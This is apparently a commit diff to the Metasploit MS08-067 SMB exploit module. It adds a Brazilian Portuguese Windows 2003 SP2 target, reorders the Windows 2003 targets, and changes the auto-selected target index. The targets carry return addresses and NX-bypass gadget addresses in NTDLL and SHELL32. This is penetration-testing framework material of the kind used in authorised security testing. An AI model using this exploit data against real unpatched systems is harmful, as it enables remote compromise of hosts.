Add Portuguese target, lands rapid7#3961 (also reorders targets)

HD Moore · HD Moore · commit 50b734f996cf · 2014-12-12T14:23:02.000-06:00
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -88,6 +88,14 @@ def initialize(info = {})
            }
           ], # JMP ESI SVCHOST.EXE
 
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP0 Universal',
+           {
+             'Ret'       => 0x0100129e,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI SVCHOST.EXE
+
           #
           # ENGLISH TARGETS
           #
@@ -128,79 +136,6 @@ def initialize(info = {})
            }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
-          # Standard return-to-ESI without NX bypass
-          ['Windows 2003 SP0 Universal',
-           {
-             'Ret'       => 0x0100129e,
-             'Scratch'   => 0x00020408,
-           }
-          ], # JMP ESI SVCHOST.EXE
-
-          # Standard return-to-ESI without NX bypass
-          ['Windows 2003 SP1 English (NO NX)',
-           {
-             'Ret'       => 0x71bf21a2,
-             'Scratch'   => 0x00020408,
-           }
-          ], # JMP ESI WS2HELP.DLL
-
-          # Brett Moore's crafty NX bypass for 2003 SP1
-          ['Windows 2003 SP1 English (NX)',
-           {
-             'RetDec'    => 0x7c90568c,	 # dec ESI, ret @SHELL32.DLL
-             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
-             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
-             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
-             'Scratch'   => 0x00020408,
-           }
-          ],
-
-          # Standard return-to-ESI without NX bypass
-          ['Windows 2003 SP1 Japanese (NO NX)',
-           {
-             'Ret'       => 0x71a921a2,
-             'Scratch'   => 0x00020408,
-           }
-          ], # JMP ESI WS2HELP.DLL
-
-          # Standard return-to-ESI without NX bypass
-          ['Windows 2003 SP2 English (NO NX)',
-           {
-             'Ret'       => 0x71bf3969,
-             'Scratch'   => 0x00020408,
-           }
-          ], # JMP ESI WS2HELP.DLL
-
-          # Brett Moore's crafty NX bypass for 2003 SP2
-          ['Windows 2003 SP2 English (NX)',
-           {
-             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
-             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
-             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
-             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
-             'Scratch'   => 0x00020408,
-           }
-          ],
-
-          # Standard return-to-ESI without NX bypass
-          ['Windows 2003 SP2 German (NO NX)',
-           {
-             'Ret'       => 0x71a03969,
-             'Scratch'   => 0x00020408,
-           }
-          ], # JMP ESI WS2HELP.DLL
-
-          # Brett Moore's crafty NX bypass for 2003 SP2
-          ['Windows 2003 SP2 German (NX)',
-           {
-             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
-             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
-             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
-             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
-             'Scratch'   => 0x00020408,
-           }
-          ],
-
           #
           # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
           #
@@ -637,12 +572,34 @@ def initialize(info = {})
            }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
+          #
+          # Windows 2003 Targets
+          #
+
           # Standard return-to-ESI without NX bypass
-          # Provided by Masashi Fujiwara
-          ['Windows 2003 SP2 Japanese (NO NX)',
+          ['Windows 2003 SP1 English (NO NX)',
            {
-             'Ret'       => 0x71a91ed2,
-             'Scratch'   => 0x00020408
+             'Ret'       => 0x71bf21a2,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP1
+          ['Windows 2003 SP1 English (NX)',
+           {
+             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
+             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
+          ],
+
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP1 Japanese (NO NX)',
+           {
+             'Ret'       => 0x71a921a2,
+             'Scratch'   => 0x00020408,
            }
           ], # JMP ESI WS2HELP.DLL
 
@@ -665,6 +622,54 @@ def initialize(info = {})
            }
           ],
 
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP2 English (NO NX)',
+           {
+             'Ret'       => 0x71bf3969,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          ['Windows 2003 SP2 English (NX)',
+           {
+             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
+             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
+          ],
+
+          # Standard return-to-ESI without NX bypass
+          ['Windows 2003 SP2 German (NO NX)',
+           {
+             'Ret'       => 0x71a03969,
+             'Scratch'   => 0x00020408,
+           }
+          ], # JMP ESI WS2HELP.DLL
+
+          # Brett Moore's crafty NX bypass for 2003 SP2
+          ['Windows 2003 SP2 German (NX)',
+           {
+             'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
+             'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
+          ],
+
+          # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
+          [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
+              'Scratch'   => 0x00020408,
+            }
+          ],
           # Standard return-to-ESI without NX bypass
           ['Windows 2003 SP2 Spanish (NO NX)',
            {
@@ -682,7 +687,16 @@ def initialize(info = {})
              'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
              'Scratch'   => 0x00020408,
            }
-          ]
+          ],
+
+          # Standard return-to-ESI without NX bypass
+          # Provided by Masashi Fujiwara
+          ['Windows 2003 SP2 Japanese (NO NX)',
+           {
+             'Ret'       => 0x71a91ed2,
+             'Scratch'   => 0x00020408
+           }
+          ], # JMP ESI WS2HELP.DLL
 
           #
           # Missing Targets
@@ -826,7 +840,7 @@ def exploit
 
       # Windows 2003 SP0 is mostly universal
       if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
-        mytarget = targets[7]
+        mytarget = targets[3]
       end
 
       # Windows 2003 R2 is treated the same as 2003
